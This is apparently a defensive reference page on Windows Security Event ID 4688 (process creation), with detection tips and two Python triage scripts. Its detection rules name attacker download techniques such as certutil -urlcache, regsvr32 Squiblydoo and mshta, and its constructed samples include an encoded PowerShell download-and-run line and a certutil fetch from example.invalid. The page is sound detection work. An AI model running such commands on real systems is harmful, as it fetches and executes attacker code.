EventPeeker
Event ID 4688 · Audit Success · Security · T1059

Windows Event ID 4688: Process Created

Logged every time a new process is created on Windows. Requires the Audit Process Creation subcategory (Advanced Audit Policy Configuration → Detailed Tracking) to be enabled via Group Policy. With command-line logging enabled, 4688 captures the full arguments passed to each process, making it one of the most operationally valuable events for detecting living-off-the-land attacks, script-based execution, parent-child anomalies, and encoded payload delivery.

MITRE ATT&CK

Technique

T1059 · Command and Scripting Interpreter

Tactic

Execution


Why It Matters

Most attacks that execute code on Windows generate 4688 events. Without command-line logging, 4688 shows only the executable name; with it, you see the full command including encoded payloads, remote file paths, and LOLBin-specific flags. Parent-child relationships are the most reliable detection signal: legitimate applications have predictable parents, and deviations — Office spawning PowerShell, explorer.exe launching cmd.exe with base64 arguments — are near-definitive malicious execution indicators.

Key Fields

New Process Name: Full path of the launched executable. Look for user-writable paths (Users\, Temp\, AppData\), names that imitate system processes (svch0st.exe with a zero for the o, or a lowercase l in place of a capital I in a name like Iexplore.exe; Windows file names are case-insensitive, so letter case alone is never the tell), and known LOLBins (certutil.exe, mshta.exe, rundll32.exe, regsvr32.exe) running from unusual locations.
Process Command Line: Full command with arguments. Requires the GPO setting Computer Configuration → Administrative Templates → System → Audit Process Creation → 'Include command line in process creation events'. Key patterns: -EncodedCommand or any unambiguous prefix of it such as -enc or -e (base64 PowerShell), IEX/Invoke-Expression, certutil -urlcache/-decode, regsvr32 /s /n /u /i:http (Squiblydoo), mshta.exe http://, bitsadmin /transfer.
Creator Process Name: The parent process, and the most reliable detection signal. High-confidence anomalies: Office apps (winword.exe, excel.exe, powerpnt.exe, onenote.exe) spawning cmd.exe/powershell.exe/wscript.exe/mshta.exe; browser processes spawning script interpreters; lsass.exe spawning any child at all.
Subject Account Name: The account that launched the process. SYSTEM spawning unexpected user-space tools, or a standard user launching administrative binaries, indicates privilege abuse.
Token Elevation Type: %%1936 = TokenElevationTypeDefault, a full token with nothing filtered (UAC disabled, the built-in Administrator, or a service/SYSTEM account); %%1937 = TokenElevationTypeFull, a UAC-elevated token (Run as administrator, a consent prompt, or a manifest that requires elevation); %%1938 = TokenElevationTypeLimited, the filtered token a UAC-enabled administrator gets when launching a program normally, and the expected value for most interactive processes. A %%1937 process appearing where the user should only hold a %%1938 token indicates a UAC bypass or privilege escalation.
New Process ID: Logged in hex and recycled by the OS, so a PID only identifies a process together with the time of its 4688. Correlate with 4689 (exit, same Process ID) for process lifetime, and with 4663/4656 for file/object access performed by that process.

Investigation Tips

  1. Enable command-line logging first. Without it, 4688 shows only the executable name and is far less valuable. GPO path: Computer Configuration → Administrative Templates → System → Audit Process Creation → 'Include command line in process creation events' → Enabled.
  2. Parent-child anomaly: Office apps (winword.exe, excel.exe, powerpnt.exe, onenote.exe) spawning cmd.exe, powershell.exe, wscript.exe, mshta.exe, or cscript.exe = malicious macro or phishing document execution. Make this a high-priority alert; the rare legitimate add-in that does this should be allow-listed individually, never used as a reason to suppress the rule.
  3. Encoded PowerShell: look for -EncodedCommand, or any unambiguous prefix of it (-e, -ec, -en, -enc), in the command line. Some management agents and installers use encoding legitimately, so baseline them, but attackers encode to defeat string matching and obscure the payload. The blob is base64 of UTF-16LE text; decode with [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('...')) and inspect the result.
  4. LOLBin patterns to alert on: certutil.exe -urlcache or -decode (file download/decode); bitsadmin.exe /transfer (background downloader); regsvr32.exe /s /n /u /i:http (remote scriptlet, Squiblydoo, no disk write); mshta.exe with an http:// argument (HTA payload); rundll32.exe executing DLLs outside System32; wscript.exe/cscript.exe running scripts from Temp or AppData.
  5. Process masquerading: check that New Process Name paths match expected locations. Legitimate svchost.exe lives only in C:\Windows\System32\ (and C:\Windows\SysWOW64\ on 64-bit Windows). Any executable with a system-process name running from Users\, Temp\, or Desktop\ is masquerading, a common malware technique.
  6. PPID spoofing: attackers can assign a new process an arbitrary parent (the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS mechanism), so Creator Process ID and Creator Process Name show the chosen parent, typically explorer.exe, rather than the real creator. 4688 records the spoofed value as-is, so detect it through lineage consistency: the claimed parent must have its own 4688 before the child's, must not have a 4689 before the child's 4688, and Creator Process Name must match the image of that PID's most recent 4688. A claimed parent that exited before the child started, or a PID whose last 4688 was a different image, is PID reuse or a spoof; confirm with telemetry that records the actual calling process (EDR or ETW process-start events) rather than the declared parent.
  7. Short-lived encoded processes: 4688 (powershell.exe -enc ...) immediately followed by 4689 (exit) = one-shot command execution. Attackers run a single command and exit to minimize presence in running process lists and reduce dwell time.
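The Key Fields checks and investigation tips 1 to 5 above, as an added Python example (not EventPeeker's code): it parses 4688 records from the event XML that wevtutil or Get-WinEvent export, decodes -EncodedCommand payloads, and applies the parent-child, LOLBin, masquerading and token-elevation checks. The sample records, the example.invalid URLs and the finding labels are constructed for the demonstration, not captured from a host.

```python
"""Field-level triage of Windows Security Event ID 4688 records.

Added example, not EventPeeker's code. Works on the event XML that wevtutil or
Get-WinEvent export; the records in SAMPLES are constructed. Rendered name to XML
name: New Process Name = NewProcessName, Creator Process Name = ParentProcessName,
Creator Process ID = ProcessId, New Process ID = NewProcessId."""
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "onenote.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "winlogon.exe", "smss.exe"}
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\")
ELEVATION = {"%%1936": "default (UAC off, built-in Administrator or SYSTEM)",
             "%%1937": "full (UAC-elevated token)", "%%1938": "limited (filtered UAC token)"}
LOLBIN_RULES = [  # regex over the lower-cased command line, finding label
    (r"certutil(\.exe)?\b.*\s-(urlcache|decode|encode)\b", "certutil download/decode"),
    (r"bitsadmin(\.exe)?\b.*\s/transfer\b", "bitsadmin /transfer"),
    (r"regsvr32(\.exe)?\b.*\s/i:https?://", "regsvr32 remote scriptlet (Squiblydoo)"),
    (r"mshta(\.exe)?\b.*\bhttps?://", "mshta remote HTA"),
]

def parse_4688(xml_text):
    """EventData of one record as {Name: value}."""
    root = ET.fromstring(xml_text)
    return {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Script behind -EncodedCommand or any unambiguous prefix (-e, -ec, -enc).
    The blob is base64 of UTF-16LE text; anything else yields None."""
    for flag, blob in re.findall(r"(?<!\S)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", cmdline, re.I):
        if "encodedcommand".startswith(flag.lower()):
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except ValueError:  # bad base64 or odd byte count: not a real payload
                return None
    return None

def triage(ev):
    """Apply the Key Fields checks to one parsed record."""
    proc, parent, cmd = ev.get("NewProcessName", ""), ev.get("ParentProcessName", ""), ev.get("CommandLine", "")
    child, par, low_proc, low_cmd = basename(proc), basename(parent), proc.lower(), cmd.lower()
    findings = []
    if par in OFFICE and child in INTERPRETERS:
        findings.append(f"office parent {par} spawned {child}")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded PowerShell: " + decoded)
    findings += [label for pattern, label in LOLBIN_RULES if re.search(pattern, low_cmd)]
    if child in ("wscript.exe", "cscript.exe") and any(p in low_cmd for p in USER_WRITABLE):
        findings.append("script host running a script from a user-writable path")
    if child == "rundll32.exe":  # flag a DLL given by path that is not under System32/SysWOW64
        m = re.search(r'rundll32(?:\.exe)?"?\s+"?([^\s,"]+\.dll)', low_cmd)
        if m and "\\" in m.group(1) and not m.group(1).startswith(SYSTEM_DIRS):
            findings.append("rundll32 loading a DLL outside System32: " + m.group(1))
    lookalike = child.replace("0", "o").replace("1", "l")  # svch0st.exe -> svchost.exe
    if lookalike in SYSTEM_NAMES and (lookalike != child or not low_proc.startswith(SYSTEM_DIRS)):
        findings.append("masquerading system process name: " + proc)
    elif any(p in low_proc for p in USER_WRITABLE):
        findings.append("executable in a user-writable path: " + proc)
    return {"process": proc, "parent": parent, "subject": ev.get("SubjectUserName", ""),
            "elevation": ELEVATION.get(ev.get("TokenElevationType", ""), "unknown"), "findings": findings}

def sample_event(new_proc, cmdline, parent, user="bob", elev="%%1938"):
    """Constructed 4688 record in the real schema, not captured from a host."""
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>4688</EventID></System><EventData>'
            f'<Data Name="SubjectUserName">{user}</Data><Data Name="NewProcessId">0x1f40</Data>'
            f'<Data Name="NewProcessName">{escape(new_proc)}</Data><Data Name="TokenElevationType">{elev}</Data>'
            f'<Data Name="ProcessId">0x0e28</Data><Data Name="CommandLine">{escape(cmdline)}</Data>'
            f'<Data Name="ParentProcessName">{escape(parent)}</Data></EventData></Event>')

PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()  # what an attacker would pass to -enc
SAMPLES = [
    sample_event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 f"powershell.exe -nop -w hidden -enc {ENC}", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    sample_event(r"C:\Windows\System32\certutil.exe", r"certutil.exe -urlcache -split -f http://example.invalid/p.txt "
                 r"C:\Users\bob\AppData\Local\Temp\p.txt", r"C:\Windows\System32\cmd.exe"),
    sample_event(r"C:\Users\bob\AppData\Local\Temp\svch0st.exe", "svch0st.exe", r"C:\Windows\explorer.exe", elev="%%1937"),
    sample_event(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
                 r"C:\Windows\System32\services.exe", user="SYSTEM", elev="%%1936"),
]

def triage_all(records=SAMPLES):
    return [triage(parse_4688(x)) for x in records]

if __name__ == "__main__":
    for r in triage_all():
        print(f'{r["process"]} <- {r["parent"]} [{r["elevation"]}]: {r["findings"] or "clean"}')
```

The prefix matching in decode_encoded_command matters in practice: powershell.exe accepts any unambiguous abbreviation of -EncodedCommand, so a rule that only matches the literal -enc or -EncodedCommand misses -e and -ec. Feed real records by exporting with wevtutil qe Security /q:"*[System[EventID=4688]]" /f:xml and splitting on Event elements.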

Related Event IDs

4689: Process exited. Pair on Process ID for the full execution lifetime.
4104: PowerShell script block. Full script content for any PowerShell processes seen here.
1102: Audit log cleared. Look for wevtutil.exe clearing the Security log via 4688.
4624: Logon event. Correlate Subject Logon ID to establish session context.
4697: Service installed. Services spawn processes; correlate to see what a service executed.
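The lineage and lifetime checks from investigation tips 6 and 7, together with the 4688/4689 pairing listed above, as an added Python example (not EventPeeker's code). It works on an already-extracted timeline rather than raw XML: one dict per event using the EventData field names, times as epoch seconds, PIDs as the hex strings the log uses. The timeline, the 5-second one-shot threshold and the finding strings are constructed for the demonstration.

```python
"""Lineage and lifetime correlation across 4688 (start) and 4689 (exit) records.

Added example, not EventPeeker's code. Input is a constructed, pre-parsed timeline:
one dict per event with the EventData names (NewProcessId, ProcessId, ...), times
as epoch seconds, PIDs as hex strings. PIDs are recycled, so a PID is only
meaningful together with the time of its 4688."""
import re
from collections import defaultdict

SHORT_LIVED_SECONDS = 5  # assumed threshold for "one-shot" execution

def build_lineage(events):
    """starts[pid] = time-ordered 4688 dicts; exits[(pid, start_t)] = 4689 time."""
    starts, exits = defaultdict(list), {}
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["EventID"] == 4688:
            starts[ev["NewProcessId"]].append(ev)
        elif ev["EventID"] == 4689 and starts.get(ev["ProcessId"]):
            exits[(ev["ProcessId"], starts[ev["ProcessId"]][-1]["t"])] = ev["t"]  # exit of the latest run
    return starts, exits

def check_parent(child, starts, exits):
    """Consistency problems with the child's claimed parent (Creator Process ID / Name)."""
    ppid = child["ProcessId"]
    runs = [p for p in starts.get(ppid, []) if p["t"] <= child["t"]]
    if not runs:  # also expected for parents that started before the log window
        return ["no 4688 for claimed parent in window"]
    parent, problems = runs[-1], []
    if parent["NewProcessName"].lower() != child["ParentProcessName"].lower():
        problems.append("claimed parent name does not match that PID's last 4688 (PID reuse or spoof)")
    exit_t = exits.get((ppid, parent["t"]))
    if exit_t is not None and exit_t < child["t"]:
        problems.append("claimed parent exited before child was created")
    return problems

def is_encoded(cmd):
    """True for -EncodedCommand or any unambiguous prefix of it (-e, -ec, -enc)."""
    flags = re.findall(r"(?<!\S)-(e[a-z]*)\s", cmd, re.I)
    return any("encodedcommand".startswith(f.lower()) for f in flags)

def short_lived_encoded(starts, exits, window=SHORT_LIVED_SECONDS):
    """(pid, lifetime) for encoded PowerShell that exited within `window` seconds."""
    hits = []
    for pid, runs in starts.items():
        for run in runs:
            exit_t = exits.get((pid, run["t"]))
            if is_encoded(run.get("CommandLine", "")) and exit_t is not None and exit_t - run["t"] <= window:
                hits.append((pid, exit_t - run["t"]))
    return hits

def start(t, pid, name, ppid, parent, cmd=""):  # constructed 4688
    return {"EventID": 4688, "t": t, "NewProcessId": pid, "NewProcessName": name,
            "ProcessId": ppid, "ParentProcessName": parent, "CommandLine": cmd}

def exit_(t, pid):  # constructed 4689
    return {"EventID": 4689, "t": t, "ProcessId": pid}

S32 = r"C:\Windows\System32"
TIMELINE = [  # constructed, not a capture
    start(50, "0x0388", S32 + r"\winlogon.exe", "0x0240", S32 + r"\smss.exe"),  # parent predates window
    start(100, "0x0a10", S32 + r"\userinit.exe", "0x0388", S32 + r"\winlogon.exe"),
    start(105, "0x0e28", r"C:\Windows\explorer.exe", "0x0a10", S32 + r"\userinit.exe"),
    exit_(106, "0x0a10"),  # userinit exits after spawning explorer: normal, child started first
    start(300, "0x1f40", S32 + r"\WindowsPowerShell\v1.0\powershell.exe", "0x0e28",
          r"C:\Windows\explorer.exe", "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    exit_(302, "0x1f40"),  # one-shot encoded command
    start(350, "0x2b00", S32 + r"\notepad.exe", "0x0e28", r"C:\Windows\explorer.exe"),
    exit_(360, "0x2b00"),
    start(370, "0x3c10", r"C:\Users\bob\AppData\Local\Temp\update.exe", "0x2b00", S32 + r"\notepad.exe"),
    start(380, "0x2b00", S32 + r"\calc.exe", "0x0e28", r"C:\Windows\explorer.exe"),  # PID 0x2b00 reused
    start(390, "0x4d20", S32 + r"\cmd.exe", "0x2b00", S32 + r"\notepad.exe"),
]

def analyze(events=TIMELINE):
    """Return ({(pid, start_t): problems}, [(pid, lifetime)]) for the timeline."""
    starts, exits = build_lineage(events)
    problems = {(c["NewProcessId"], c["t"]): check_parent(c, starts, exits)
                for runs in starts.values() for c in runs}
    return {k: v for k, v in problems.items() if v}, short_lived_encoded(starts, exits)

if __name__ == "__main__":
    print(analyze())
```

The first finding (winlogon.exe with no 4688 for its parent) shows the window-edge caveat: a missing parent record means nothing when the parent started before the log you hold, so check the earliest timestamp in the log before treating it as a spoof. The update.exe and cmd.exe findings are the two impossible lineages the tip describes, and only other telemetry that records the real caller can say which of PID reuse or spoofing produced them.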
